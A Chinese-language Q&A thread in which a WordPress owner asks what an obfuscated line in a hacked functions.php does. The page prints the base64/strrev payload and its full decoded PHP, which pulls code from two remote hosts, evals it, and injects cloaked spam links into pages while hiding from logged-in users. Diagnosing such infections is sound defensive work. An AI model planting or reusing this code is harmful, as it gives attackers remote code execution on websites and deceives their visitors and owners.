Question

我的Wordpress网站被黑了。我在functions.php页面的顶部注意到了这行代码。当我创建一个新文件并print_r它时，该文件会自动从目录中删除（太奇怪了！）。知道这行代码是做什么的吗？

<?php 
    $wp_user_functions_init = create_function('$a',strrev(';)a$(lave')); 
    $wp_user_functions_init(strrev(';))"=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"(edoced_46esab(lave'));
?>

Answer 1

想出来。 strrev反转base64字符串，输出：

if(function_exists('get_url_999')===false){function get_url_999($url){$content="";$content=@trycurl_999($url);if($content!==false)return $content;$content=@tryfile_999($url);if($content!==false)return $content;$content=@tryfopen_999($url);if($content!==false)return $content;$content=@tryfsockopen_999($url);if($content!==false)return $content;$content=@trysocket_999($url);if($content!==false)return $content;return '';}}
if(function_exists('trycurl_999')===false){function trycurl_999($url){if(function_exists('curl_init')===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result=="")return false;return $result;}}
if(function_exists('tryfile_999')===false){function tryfile_999($url){if(function_exists('file')===false)return false;$inc=@file($url);$buf=@implode('',$inc);if ($buf=="")return false;return $buf;}}
if(function_exists('tryfopen_999')===false){function tryfopen_999($url){if(function_exists('fopen')===false)return false;$buf='';$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;}}
if(function_exists('tryfsockopen_999')===false){function tryfsockopen_999($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf='';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}}
if(function_exists('trysocket_999')===false){function trysocket_999($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf='';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}}
if(function_exists('str_replace_first')===false){function str_replace_first($search, $replace, $subject) {$pos = stripos($subject, $search);if ($pos !== false) {	$subject = substr_replace($subject, $replace, $pos, strlen($search));}	return $subject;}}
if(function_exists('is_bot_ua')===false){function is_bot_ua(){$bot=0;$ua=@$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"googlebot"))$bot=1;return $bot;}}
if(function_exists('is_googlebot_ip')===false){function is_googlebot_ip(){$k=0;$ip=sprintf("%u",@ip2long(@$_SERVER["REMOTE_ADDR"]));if (($ip>=1123631104)&&($ip<=1123639295))$k=1;return $k;}}

if(function_exists('update_file_999')===false){
function update_file_999(){

	$uri="g.php?t=k&i=6fbbd830cf5579febe12fd5cc7cd2e1b";
	$actual1="http://pupkonexs.com/".$uri;
	$actual2="http://cooperjsutf8.ru/".$uri;
	$val=get_url_999($actual1);
	if ($val=="")$val=get_url_999($actual2);
	if (strstr($val,"|||CODE|||")){
		list($val,$code)=explode("|||CODE|||",$val);
		eval(base64_decode($code));
	}
	return $val;
}
}


if(function_exists('callback_function_php')===false){
function callback_function_php($p) {

	if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) ) {
		return $p;
	}

	if (stristr($_SERVER['REQUEST_URI'],"xmlrpc.php")){
		return $p;
	}

	if (stristr($_SERVER['REQUEST_URI'],"wp-login")){
		return $p;
	}

	if (stristr($_SERVER['REQUEST_URI'],"wp-admin")){
		return $p;
	}


	$x='{options_names}';
	$buf="";
	$update=0;
	$k = get_option($x);
	if ($k===FALSE){
		$emp=array();
		if (!add_option($x,$emp,'','no')){
			return $p;
		}
		$update=1;
	}else{
		$ctime=time()-@$k[1];
		if ($ctime>3600*12){
			$update=1;
		}
		
	}
	if ($update){
		$val=update_file_999();
		$k=array();
		$k[0]=$val;
		$k[1]=time();
		if (!update_option($x,$k)){
			return $p;
		}
	}
	if (!$k = get_option($x)){
		return $p;
	}

	$buf=@$k[0];
	if ($buf==""){
		return $p;
	}
	list($type,$text)=@explode("|||",$buf);
	if ($text=="")return $p;

	$type+=0;
	$bot=0;
	if ($type==0){
		$buf1=@base64_decode($text);
		list($tagjs,$js,$tagtext1,$text1)=@explode("|||",$buf1);

		if (stristr($p,$text1))return $p;

		if (($tagjs!="")&&(stristr($p,$tagjs))){
			$p=str_replace_first($tagjs, $js." ".$tagjs, $p);
		}else{
			$p=$p.$js;
		}
		if (($tagtext1!="")&&(stristr($p,$tagtext1))){
			$p=str_replace_first($tagtext1, $text1." ".$tagtext1, $p);
		}else{
			$p=$p.$text1;
		}
		
	}else
	if (($type==1)||($type==2)||($type==3)||($type==4)){
		if (($type==1)||($type==4)){
			$bot=is_bot_ua();
		}
		if (($type==2)||($type==3)){
			$bot=is_googlebot_ip();
		}

		if ($bot){
			$buf1=@base64_decode($text);
			list($tag,$text1)=@explode("|||",$buf1);
			if (($tag!="")&&($text1!="")){

				if (stristr($p,$tag)){
					if (($type==3)||($type==4)){
						$p=@str_ireplace($tag,$tag." ".$text1,$p); 
					}else{
						$p=str_replace_first($tag, $tag." ".$text1, $p);
					}
				}else{
					$p=$p.$text1;
				}
			}

		}
	}


	return $p; 
} 
}

if(function_exists('ob_start')){
	ob_start("callback_function_php");
}

Answer 2

执行的代码似乎从远程服务器获取html链接。所以它看起来像SEO的恶意链接。

Wordpress网站被黑了。这段代码有什么作用？

2 个答案: